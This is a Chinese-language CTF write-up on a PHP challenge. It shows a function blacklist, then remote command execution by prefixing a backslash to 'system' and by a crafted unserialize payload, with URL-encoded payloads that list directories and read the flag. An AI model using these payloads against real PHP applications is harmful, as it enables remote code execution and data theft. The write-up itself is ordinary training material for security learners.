目錄
方法一:
方法二:
知識點:
1)黑名單取巧繞過
2)PHP的file_get_contents函式使用
3)PHP序列化與反序列化構造
訪問靶機,觀察頁面,開始時首先加載了一張圖片,隨后重繪回顯時間,并且網頁每隔一段時間會重繪一次,頻率大概五秒一次
F12查看原始碼,和觀察的一樣,setTimeout("document.form1.submit()",5000)每隔五秒鐘將會提交一次form1,然后是一串時間字串2021-10-20 12:14:50 pm
注意:重點是靶機內的form1表單,index.php用post方式提交了兩個引數,func和p,func的值為date,p值Y-m-d h:i:s a
分析:接收到func和p,執行PHP內的date函式和格式化的Y-m-d h:i:s a,然后輸出結果,既然這樣,猜想一下在PHP內,執行$func="date",肯定是沒有問題的,但是如果提交的不是date,而是system,或exec呢?
不妨用php內的md5函式測驗一下,123經過md5加密后的值為202cb962ac59075b964b07152d234b70,如果成功執行回顯在網頁上,猜測就正確
構造測驗paylaod:?func=md5&p=123
做個代碼執行?被攔截了,可以fuzz查看哪些函式被黑名單
這里可以利用file_get_contents獲取index.php的原始碼,如下:
file_get_contents(path):讀取path路徑下檔案的內容
果然定義了一個disable_fun,然后巴拉巴拉一堆黑名單,代碼審計
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);//調呼叫傳遞函式,并回傳函式運行的結果(本例中即為執行$func($p))
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {//非空
$func = strtolower($func);//轉小寫
if (!in_array($func,$disable_fun)) {//判斷是否存在黑名單
echo gettime($func, $p);//如果不存在則呼叫gettime,把funchep傳入
}else {
die("Hacker...");//報錯
}
}
?>這里有兩種解法,一種是像大部分wp一樣構造序列化得flag,出題人大概也是這個意圖,另外一種解法比較巧取
方法一:
首先判斷是否存在與黑名單,php內的" \ "在做代碼執行的時候,會識別特殊字串,繞過黑名單
payload:?func=\system&p=ls /
常用命令:
system('ls') : 列舉當前目錄下的所有檔案
system("find / -name flag"):查找所有檔案名匹配flag的檔案
payload:?func=\system&p=find / -name flag*
payload:?func=\system&p=cat /tmp/flagoefiu4r93
方法二:
這種方法就是大部分答案寫的反序列化得flag手段
首先看下剛才index.php原始碼內的一串代碼
class Test {
var $p = "Y-m-d h:i:s a";//定義p和func
var $func = "date";
function __destruct() {//物件被創建時自動呼叫
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
如果用反序列化的方式呼叫system呢,提交的func為unserialize,p為序列化后的字串,然后反序列化test類
<?php
?
class Test{
public $func;
public $p;
}
?
$ganyu=new Test();
$ganyu->func="system";
$ganyu->p="ls -alh /";
?
echo urlencode(serialize($ganyu));
?>
構造查看根目錄的payload,由于以p提交的為序列化內容,func需設定為unserialize:
?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A9%3A%22ls+-alh+%2F%22%3B%7D
然后就是構造查找flag檔案的payload
<?php
class Test{
public $func;
public $p;
}
$ganyu=new Test();
$ganyu->func="system";
$ganyu->p="find / -name flag*";
echo urlencode(serialize($ganyu));
?>
最后構造查詢flag的payload得到flag
<?php
class Test{
public $func;
public $p;
}
$ganyu=new Test();
$ganyu->func="system";
$ganyu->p="cat /tmp/flagoefiu4r93";
echo urlencode(serialize($ganyu));
?>?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A22%3A%22cat+%2Ftmp%2Fflagoefiu4r93%22%3B%7D
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/330096.html
標籤:其他
上一篇:再次捕獲云上在野容器攻擊,TeamTNT黑產攻擊方法揭秘
下一篇:SSRF-CTFshow